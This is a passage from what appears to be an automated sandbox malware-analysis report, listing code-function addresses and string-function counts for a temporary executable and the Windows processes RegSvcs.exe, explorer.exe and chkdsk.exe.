            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_055AD07014_2_055AD070
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_055AC57814_2_055AC578
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_055AC56814_2_055AC568
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_055AC51814_2_055AC518
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_055AD06014_2_055AD060
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_055ABF7814_2_055ABF78
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_055ABF6B14_2_055ABF6B
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_077B6EC814_2_077B6EC8
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_077B6EB714_2_077B6EB7
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_077B651814_2_077B6518
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_077B4D1014_2_077B4D10
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_077B4D0014_2_077B4D00
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_077B650714_2_077B6507
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_077BBCB014_2_077BBCB0
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_077B44A014_2_077B44A0
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_077B449D14_2_077B449D
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_077B093414_2_077B0934
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_077B11B114_2_077B11B1
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_077B48D814_2_077B48D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040549C15_2_0040549C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004029D415_2_004029D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0040103019_2_00401030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041F03019_2_0041F030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041EB3B19_2_0041EB3B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041DBBA19_2_0041DBBA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041E56B19_2_0041E56B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00402D9019_2_00402D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00409E6019_2_00409E60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041D68419_2_0041D684
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041EEAC19_2_0041EEAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00402FB019_2_00402FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA200019_2_00FA2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC81CC19_2_00FC81CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD01AA19_2_00FD01AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC41A219_2_00FC41A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F9815819_2_00F98158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAA11819_2_00FAA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0010019_2_00F00100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F902C019_2_00F902C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB027419_2_00FB0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1E3F019_2_00F1E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD03E619_2_00FD03E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FCA35219_2_00FCA352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FBE4F619_2_00FBE4F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC244619_2_00FC2446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB442019_2_00FB4420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD059119_2_00FD0591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1053519_2_00F10535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2C6E019_2_00F2C6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0C7C019_2_00F0C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1077019_2_00F10770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3475019_2_00F34750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3E8F019_2_00F3E8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EF68B819_2_00EF68B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1A84019_2_00F1A840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1284019_2_00F12840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F129A019_2_00F129A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FDA9A619_2_00FDA9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2696219_2_00F26962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0EA8019_2_00F0EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC6BD719_2_00FC6BD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FCAB4019_2_00FCAB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F00CF219_2_00F00CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB0CB519_2_00FB0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10C0019_2_00F10C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0ADE019_2_00F0ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F28DBF19_2_00F28DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FACD1F19_2_00FACD1F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1AD0019_2_00F1AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FCEEDB19_2_00FCEEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F22E9019_2_00F22E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FCCE9319_2_00FCCE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10E5919_2_00F10E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FCEE2619_2_00FCEE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1CFE019_2_00F1CFE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F02FC819_2_00F02FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8EFA019_2_00F8EFA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F84F4019_2_00F84F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F30F3019_2_00F30F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB2F3019_2_00FB2F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F52F2819_2_00F52F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC70E919_2_00FC70E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FCF0E019_2_00FCF0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F170C019_2_00F170C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FBF0CC19_2_00FBF0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1B1B019_2_00F1B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FDB16B19_2_00FDB16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F4516C19_2_00F4516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFF17219_2_00EFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB12ED19_2_00FB12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2B2C019_2_00F2B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F152A019_2_00F152A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F5739A19_2_00F5739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFD34C19_2_00EFD34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC132D19_2_00FC132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0146019_2_00F01460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FCF43F19_2_00FCF43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD95C319_2_00FD95C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAD5B019_2_00FAD5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC757119_2_00FC7571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC16CC19_2_00FC16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F5563019_2_00F55630
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FCF7B019_2_00FCF7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F138E019_2_00F138E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F7D80019_2_00F7D800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1995019_2_00F19950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2B95019_2_00F2B950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA591019_2_00FA5910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FBDAC619_2_00FBDAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F55AA019_2_00F55AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FADAAC19_2_00FADAAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB1AA319_2_00FB1AA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F83A6C19_2_00F83A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FCFA4919_2_00FCFA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC7A4619_2_00FC7A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F85BF019_2_00F85BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F4DBF919_2_00F4DBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2FB8019_2_00F2FB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FCFB7619_2_00FCFB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FCFCF219_2_00FCFCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F89C3219_2_00F89C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2FDC019_2_00F2FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC7D7319_2_00FC7D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC1D5A19_2_00FC1D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F13D4019_2_00F13D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F19EB019_2_00F19EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00ED3FD519_2_00ED3FD5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00ED3FD219_2_00ED3FD2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FCFFB119_2_00FCFFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F11F9219_2_00F11F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FCFF0919_2_00FCFF09
            Source: C:\Windows\explorer.exeCode function: 20_2_101E123220_2_101E1232
            Source: C:\Windows\explorer.exeCode function: 20_2_101E003620_2_101E0036
            Source: C:\Windows\explorer.exeCode function: 20_2_101D708220_2_101D7082
            Source: C:\Windows\explorer.exeCode function: 20_2_101DE91220_2_101DE912
            Source: C:\Windows\explorer.exeCode function: 20_2_101D8D0220_2_101D8D02
            Source: C:\Windows\explorer.exeCode function: 20_2_101DBB3020_2_101DBB30
            Source: C:\Windows\explorer.exeCode function: 20_2_101DBB3220_2_101DBB32
            Source: C:\Windows\explorer.exeCode function: 20_2_101E45CD20_2_101E45CD
            Source: C:\Windows\explorer.exeCode function: 20_2_107B203620_2_107B2036
            Source: C:\Windows\explorer.exeCode function: 20_2_107A908220_2_107A9082
            Source: C:\Windows\explorer.exeCode function: 20_2_107B091220_2_107B0912
            Source: C:\Windows\explorer.exeCode function: 20_2_107AAD0220_2_107AAD02
            Source: C:\Windows\explorer.exeCode function: 20_2_107B65CD20_2_107B65CD
            Source: C:\Windows\explorer.exeCode function: 20_2_107B323220_2_107B3232
            Source: C:\Windows\explorer.exeCode function: 20_2_107ADB3220_2_107ADB32
            Source: C:\Windows\explorer.exeCode function: 20_2_107ADB3020_2_107ADB30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0549053521_2_05490535
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0555059121_2_05550591
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0554244621_2_05542446
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0553442021_2_05534420
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0553E4F621_2_0553E4F6
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054B475021_2_054B4750
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0549077021_2_05490770
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0548C7C021_2_0548C7C0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054AC6E021_2_054AC6E0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0551815821_2_05518158
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0548010021_2_05480100
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0552A11821_2_0552A118
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_055481CC21_2_055481CC
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_055441A221_2_055441A2
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_055501AA21_2_055501AA
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0552200021_2_05522000
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0554A35221_2_0554A352
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_055503E621_2_055503E6
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0549E3F021_2_0549E3F0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0553027421_2_05530274
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_055102C021_2_055102C0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0549AD0021_2_0549AD00
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0552CD1F21_2_0552CD1F
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0548ADE021_2_0548ADE0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054A8DBF21_2_054A8DBF
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05490C0021_2_05490C00
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05480CF221_2_05480CF2
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05530CB521_2_05530CB5
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05504F4021_2_05504F40
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05532F3021_2_05532F30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054D2F2821_2_054D2F28
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054B0F3021_2_054B0F30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05482FC821_2_05482FC8
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0549CFE021_2_0549CFE0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0550EFA021_2_0550EFA0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05490E5921_2_05490E59
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0554EE2621_2_0554EE26
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0554EEDB21_2_0554EEDB
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0554CE9321_2_0554CE93
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054A2E9021_2_054A2E90
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054A696221_2_054A6962
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054929A021_2_054929A0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0555A9A621_2_0555A9A6
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0549A84021_2_0549A840
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0549284021_2_05492840
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054BE8F021_2_054BE8F0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054768B821_2_054768B8
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0554AB4021_2_0554AB40
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05546BD721_2_05546BD7
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0548EA8021_2_0548EA80
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0554757121_2_05547571
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_055595C321_2_055595C3
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0552D5B021_2_0552D5B0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0548146021_2_05481460
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0554F43F21_2_0554F43F
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0554F7B021_2_0554F7B0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054D563021_2_054D5630
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_055416CC21_2_055416CC
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C516C21_2_054C516C
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0547F17221_2_0547F172
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0555B16B21_2_0555B16B
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0549B1B021_2_0549B1B0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054970C021_2_054970C0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0553F0CC21_2_0553F0CC
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0554F0E021_2_0554F0E0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_055470E921_2_055470E9
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0547D34C21_2_0547D34C
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0554132D21_2_0554132D
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054D739A21_2_054D739A
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054AB2C021_2_054AB2C0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_055312ED21_2_055312ED
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054952A021_2_054952A0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05493D4021_2_05493D40
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05541D5A21_2_05541D5A
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05547D7321_2_05547D73
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054AFDC021_2_054AFDC0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05509C3221_2_05509C32
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0554FCF221_2_0554FCF2
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0554FF0921_2_0554FF09
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05453FD521_2_05453FD5
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05453FD221_2_05453FD2
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05491F9221_2_05491F92
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0554FFB121_2_0554FFB1
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05499EB021_2_05499EB0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0549995021_2_05499950
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054AB95021_2_054AB950
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0552591021_2_05525910
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054FD80021_2_054FD800
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054938E021_2_054938E0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0554FB7621_2_0554FB76
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05505BF021_2_05505BF0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054CDBF921_2_054CDBF9
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054AFB8021_2_054AFB80
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05547A4621_2_05547A46
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0554FA4921_2_0554FA49
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05503A6C21_2_05503A6C
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0553DAC621_2_0553DAC6
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054D5AA021_2_054D5AA0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05531AA321_2_05531AA3
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0552DAAC21_2_0552DAAC
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00A4F03021_2_00A4F030
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00A4E56B21_2_00A4E56B
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00A4D68421_2_00A4D684
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00A4EB3B21_2_00A4EB3B
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00A32D9021_2_00A32D90
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00A4EEAC21_2_00A4EEAC
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00A39E6021_2_00A39E60
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00A32FB021_2_00A32FB0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 054FEA12 appears 86 times
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 054C5130 appears 58 times
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0550F290 appears 105 times
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0547B970 appears 280 times
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 054D7E54 appears 110 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00F7EA12 appears 86 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0041219C appears 45 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00405B6F appears 42 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00EFB970 appears 280 times
